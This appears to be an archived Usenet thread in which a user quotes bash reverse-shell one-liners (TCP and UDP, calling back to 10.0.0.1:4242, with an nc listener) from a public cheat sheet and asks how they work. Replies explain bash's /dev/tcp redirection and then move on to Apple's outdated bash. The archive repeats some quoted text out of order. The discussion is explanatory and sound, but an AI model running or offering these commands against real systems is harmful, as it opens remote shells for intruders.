Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss
Reverse tcp/udp Shell with bash.
277 views
Skip to first unread message
hongy...@gmail.com
Mar 4, 2021, 8:57:35 PM3/4/21
to
On this webpage <https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#reverse-shell>, I noticed the following methods to get the reverse shell of tcp/udp with bash
<quote>
Bash TCP
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
Bash UDP
Victim:
sh -i >& /dev/udp/10.0.0.1/4242 0>&1
Listener:
nc -u -lvp 4242
</quote>
I try to understand the mechanism of the above codes but still not quite clear about the communication process. OTOH, why the nc is used for the udp case whereas the method for the tcp case is implemented purely based on I/O redirection?
Regards,
HY
<quote>
Bash TCP
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
Bash UDP
Victim:
sh -i >& /dev/udp/10.0.0.1/4242 0>&1
Listener:
nc -u -lvp 4242
</quote>
I try to understand the mechanism of the above codes but still not quite clear about the communication process. OTOH, why the nc is used for the udp case whereas the method for the tcp case is implemented purely based on I/O redirection?
Regards,
HY
Luuk
Mar 5, 2021, 11:55:32 AM3/5/21
to
zsh: no such file or directory: /dev/udp/10.0.0.1/4242
--
Luuk
Lew Pitcher
Mar 5, 2021, 12:52:31 PM3/5/21
to
Bash handles several filenames specially when they are used in
redirections, as described in the following table
...
/dev/tcp/host/port
If host is a valid hostname or Internet address, and port
is an integer port number or service name, bash attempts
to open the corresponding TCP socket.
/dev/udp/host/port
If host is a valid hostname or Internet address, and port
is an integer port number or service name, bash attempts
to open the corresponding UDP socket.
AFAICT, zsh does not support this form of redirection.
--
Lew Pitcher
"In Skills, We Trust"
Luuk
Mar 10, 2021, 3:57:30 AM3/10/21
to
% sh --version
GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin19)
Copyright (C) 2007 Free Software Foundation, Inc.
--
Luuk
Barry Margolin
Mar 13, 2021, 1:47:50 AM3/13/21
to
In article <604889f6$0$16493$e4fe...@newszilla.xs4all.nl>,
released with a later version of the GPL that they don't agree with. So
we're stuck with years-old versions like this.
--
Barry Margolin, bar...@alum.mit.edu
Arlington, MA
*** PLEASE post questions in newsgroups, not directly to me ***
Luuk <lu...@invalid.lan> wrote:
> or, apple does not support it, and has a bas implementation of bash.
>
> % sh --version
> GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin19)
> Copyright (C) 2007 Free Software Foundation, Inc.
IIRC, Apple stopped updating GNU applications to versions that were
> or, apple does not support it, and has a bas implementation of bash.
>
> % sh --version
> GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin19)
> Copyright (C) 2007 Free Software Foundation, Inc.
released with a later version of the GPL that they don't agree with. So
we're stuck with years-old versions like this.
--
Barry Margolin, bar...@alum.mit.edu
Arlington, MA
*** PLEASE post questions in newsgroups, not directly to me ***
0 new messages